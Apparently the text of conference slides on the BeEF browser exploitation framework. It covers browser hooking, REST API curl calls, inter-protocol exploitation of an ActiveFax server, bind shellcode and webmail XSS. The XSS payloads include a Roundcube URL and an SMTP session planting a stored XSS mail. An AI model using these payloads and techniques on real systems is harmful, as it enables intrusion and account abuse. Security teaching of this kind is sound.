2. whoami
Bart Leppens
● BeEF developer (since may 2012)
● Ported BeEF Bind shellcode to Linux
● Smashing the stack for FUN
@bmantra In
3. Disclaimer
● The views and opinions expressed here are my own and
do not necessarily represent those of my employer
● My employer has absolutely nothing to do with anything
related to BeEF
● I’m not speaking in the representation of my company
4. What the talk?
● BeEF: Browser Exploitation Framework
○ architecture
○ modules
○ extensions
● … live demos and videos
5. BeEF: Browser Exploitation Framework
● Professional security tool
● Focus on client side attack vectors
● Real attack scenarios
● v1.0 by Wade Alcorn
http://beefproject.comhttps://github.com/beefproject/beef
6. BeEF: Live CD
● https://github.
com/beefproject/beef/wiki/BeEF-
Live-CD
● Ubuntu 12.04 LTS
● Ruby 1.9.3p194
● Metasploit and sqlmap
8. BeEF: Hook a Browser
Inject the javascript hook to the DOM
● Cross-site Scripting
● MiTM
● Controlling DNS
● Social Engineering
● … be creative ;)
9. BeEF: Polling
● Once the browser is hooked, the browser
will ‘poll’ BeEF for new JavaScript
payloads to execute
● When a payload is found, the browser will
execute it
10. BeEF: A Whole Lot Of Modules
● Many different purposes
○ Information gathering
○ Social Engineering
○ Network Discovery
○ ...
● Easy to extend with your own modules
● Complex scenarios with RestFul API
http://beefproject.comhttps://github.com/beefproject/beef
12. BeEF: config.yaml
Provides basic information
● name of author
● category
● working browsers
● determines if module is enabled
http://beefproject.comhttps://github.com/beefproject/beef
15. BeEF: Sesame Magic Browser
“Internal server vulnerabilities are sitting there bored and lonely”
- Michele Orru` // ”ActiveFax, you look very bored” - Bart Leppens
19. BeEF: GlassFish XSRF
● REST CSRF in GlassFish 3.1.1 (build 12)
● Bug FOUND by Roberto Suggi Liverani
● According to ORACLE the 3th most critical
bug ever in SUN products
● Demo (fingerprint + exploit)
20. BeEF: CookieJar overflow
● JavaScript cannot modify HTTPOnly-cookies
● John Wilander overflowed the CookieJar
● Recreate those cookies
● Demo
21. BeEF: Autorun
● launch modules automatically on new
hooked browsers
● edit config.yaml set autorun: true in
each module
● limitation => used with default parameters
22. BeEF: RESTful API
Scripting BeEF through HTTP/JSON requests
● token parameter must be always added to
requests
● GET or POST
● Automate advanced attacks automatically
23. BeEF: RESTful API
Authentication
● Post credentials to /api/admin/login
● return authentication token
● e.g. curl -H "Content-Type:
application/json" -X POST -d
'{"username":"beef", "password":"beef"}'
http://127.0.0.1:3000/api/admin/login
24. BeEF: RESTful API
Hooked Browsers
● GET to /api/hooks
● return online/offline hooked browsers
● e.g. curl http://127.0.0.1:
3000/api/hooks?token=[token]
25. BeEF: RESTful API
Browser Details
● GET to /api/hooks/:session
● Information on the hooked browser
● e.g. curl http://127.0.0.1:
3000/api/hooks/[session]?token=[token]
26. BeEF: RESTful API
List Command Modules
● GET to /api/modules
● e.g. curl http://127.0.0.1:
3000/api/modules?token=[token]
27. BeEF: RESTful API
Informations on a specific module
● GET to /api/modules/:module_id
● e.g. curl http://127.0.0.1:
3000/api/modules/[module_id]?token=
[token]
28. BeEF: RESTful API
Launch a command on a specific browser
● POST to /api/modules/:session/:module_id
● e.g. curl -H "Content-Type:
application/json; charset=UTF-8" -d
'{"question":"wtf?"}' -X POST http://127.
0.0.1:3000/api/modules/[session]/
[module]?token=[token]
29. BeEF: RESTful API
Return information about the command module
previously executed
● GET to /api/modules/:session/:mod_id/:
cmd_id
● e.g. curl http://127.0.0.1:
3000/api/modules/[session]/[module_id]/
[cmd_id]?token=[token]
30. BeEF: RESTful API
A whole lot more:
● control BeEF DNS rules
● Access Logs
● ...
Refer to the BeEF Wiki: https://github.
com/beefproject/beef/wiki/BeEF-RESTful-API
31. BeEF: Console
Console is a BeEF extension
● metasploit-like console
● should be enabled in the main config.
yaml
● control hooked browsers
32. BeEF: Metasploit integration
Console is a BeEF extension
● should be enabled in the main config.
yaml
● should be configured in
extentions/metasploit/
● msfrpcd can be launched automatically
from within BeEF :-)
33. IPC: Inter-Protocol Communication
● Initial research by Wade Alcorn in 2006/2007
● “Tolerant” protocol implementation that does
not drop the client connection after N errors
● A properly encoded POST request can be
send to the target:
○ HTTP Headers are parsed as BAD COMMANDS
○ HTTP request body is parsed as VALID
COMMANDS (or as SHELLCODE)
34. IPC: Limitations
● Some ports are banned by the Browser (e.g.
21,25,110,..)
● Content-Type: text/plain or multipart/form-
data
● Doesn’t work well with binary protocols =>
often not that tolerant
35. IPC: ActiveFax Server
● Extended research done in 2013 by Michele
Orru` & myself
● Widely used Fax solution
● Manual suggest port 3000 for RAW socket
● Protocol is very tolerant
● Commands are formatted as: @Fxxx data@
36. IPC: ActiveFax Server (example message)
Sender...................... Bart Leppens, +1 11 112233-25
Recipient 1............... OWASP Belgium, Fax: 016 123456
Subject..................... IPC is cool
Priority...................... Very High
@F101 Bart Leppens@@F110 +1 11 112233-25@
@F201 OWASP Belgium@@F211 016 123456@
@F307 IPC is cool@
@F301 1@
37. IPC: ActiveFax Server (XHR)
var xhr = new XMLHttpRequest();
var uri = "http://x.x.x.x:3000/";
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain");
var post_body = "@F101 Bart Leppens@@F110 +1 11 112233-
25@@F201 OWASP Belgium@@F211 016 123456@@F307 IPC is
cool@@F301 1@";
xhr.send(post_body);
38. IPC: ActiveFax Server (XHR)
POST / HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:24.0) Gecko/20100101
Firefox/24.0
..
Content-Type: text/plain; charset=UTF-8
Cache-Control: no-cache
@F101 Bart Leppens@@F110 +1 11 112233-25@@F201 OWASP
Belgium@@F211 016 123456@@F307 IPC is cool@@F301 1@
40. IPC: ActiveFax Server (Time-out)
The ActiveFax RAW socket takes 60 seconds to time-out.
We can fix that! 2 seconds is more then enough to send a FAX over a
LAN network:
xhr = new XMLHttpRequest();
..
xhr.send(post_body);
setTimeout(function(){xhr.abort()}, 2000);
42. BeEF: NAT Pinning
● Samy Kamkar in 2010
● Trick user to visit page
● Access port on internal network (via IPC)
● Connection Tracking must be enabled
● not only routers, IPTables with connection
tracking works as well
44. IPE: Inter-Protocol Exploitation
● Research by Wade Alcorn (extension of IPC)
● Extended research in 2012 by Michele Orru`
○ QualCOMM WorldMail IMAP 3.0
● More research in 2013 by Michele & myself
○ ActiveFax Server
45. IPE: Inter-Protocol Exploitation
● Need to send binary data
○ sendAsBinary (FF, Chrome)
● Same restrictions: tolerance, blocked ports
● More restrictions: header space, bad chars
46. IPE: ActiveFax 5.01 RAW Server Exploit
● bug found by Craig Freyman
● @F506 crashes after 1024 bytes
● Many bad characters:
○ 0x00 -> 0x19
○ 0x40 (@)
● PoC modified to use IPE
49. BeEF Bind Shellcode
● Shellcode written by Ty Miller (Win32)
● Allows communication from the browser to a
shell
○ Commands are proxied back and forth through the
browser to cmd.exe
○ Stage is delivered through the browser as well
50. BeEF Bind Shellcode: The Stager
● Stager listens on a specified port for HTTP
requests
● Ignores HTTP headers and looks for the egg
“cmd=” which marks the start of our 2nd
stage (or any stage you like)
● Allocate executable memory + copy
● Jump into the stage shellcode
51. BeEF Bind Shellcode: The Stage
● Stage listens on a specified port for HTTP
requests as well
● Ignores HTTP headers and looks for “cmd=”
which marks the start of our command
● Requests are proxied back and forth from
the browser to a “cmd.exe” childprocess
● Access-Control-Allow-Origin: *
52. BeEF Bind Shellcode:
● Ported to Linux x86 and Linux x64
○ stager and stage
● Can also be used compiled with RCE vulns
● Metasploit modules are available for easily
encoding and removal of bad characters
55. Exploiting Webmail with XSS
Cross-site Scripting
● most common vulnerability
● impact = underestimated
● mail = interesting target for attacker
56. CVE-2011-2937 Round-cube
reflected Cross-site Scripting vulnerability
● found by Abyszko
● before 0.5.4
http://server/roundcube/?_mbox=<script>
alert(document.cookie)</script>
CVE score for this bug is 4.3 out of 10.
57. CVE-2014-0913 Lotus iNotes
stored Cross-site Scripting vulnerability
● IBM iNotes and Domino 8.5.3 FP6 before
IF2 and 9.0.1 before FP1
● Inject arbitrary web script or HTML via an e-
mail message
CVE score for this bug is 4.3 out of 10.
58. CVE-2014-0913 Lotus iNotes
telnet iNotesSMTPserver 25
HELO xss
MAIL FROM: attacker@evil.com
RCPT TO: poorvictim@good.com
DATA
MIME-Version: 1.0
FROM: ATTACKER <attacker@evil.com>
TO: VICTIM <poorvictim@good.com>
Subject: iNotes XSS vulnerable mail
Content-Type: text/html
<img style="display:none" src="x"/onerror="alert(1)">
59. Universal Cross-site Scripting and
webmail
● Control every origin
● Execute arbitrary code
● Control all webmail clients => including
Cloud based like gmail, yahoo mail, etc.
60. This is a myth: there ain’t no such thing
● Targeted mailbox attack
○ read mails
○ send mails
● Nesting and replication
○ Mailworm - Nduja by Rosario Valotta in
2007
■ spreading across multiple webmail services
■ named after spicy italian sausage from Calabria,
Italy
61. This is a myth: there ain’t no such thing
● DDoS of server
○ BeEF DOSer-module
○ also internal servers (via victims browser)
● DDoS of mailbox
○ multiple zombies sending mails to victim
62. This is a myth: there ain’t no such thing
● Sending spam
○ by email account of trusted user
● Download infection
○ attachment that seems to be sent from
well-know user (=victim)
○ Replace attachment links in existing mails
63. This is a myth: there ain’t no such thing
● Modify existing “notes”
● Social Engineering attacks by mail
● Perform reset of passwords
● names.nsf in iNotes
● ….
64. This is a myth: there ain’t no such thing
4.3/10
66. Tunneling Proxy
Reverse HTTP Proxy
● hooked browser = exit point
● XHR requests or WebSockets
● limited to the hooked domain and security
context of the victims browser
67. Tunneling Proxy
Attack scenarios
● browsing hooked domain (security context of
the victim browser)
● spidering hooked domain
● finding and exploiting SQLi with Burp Pro
Scanner and sqlmap
● Video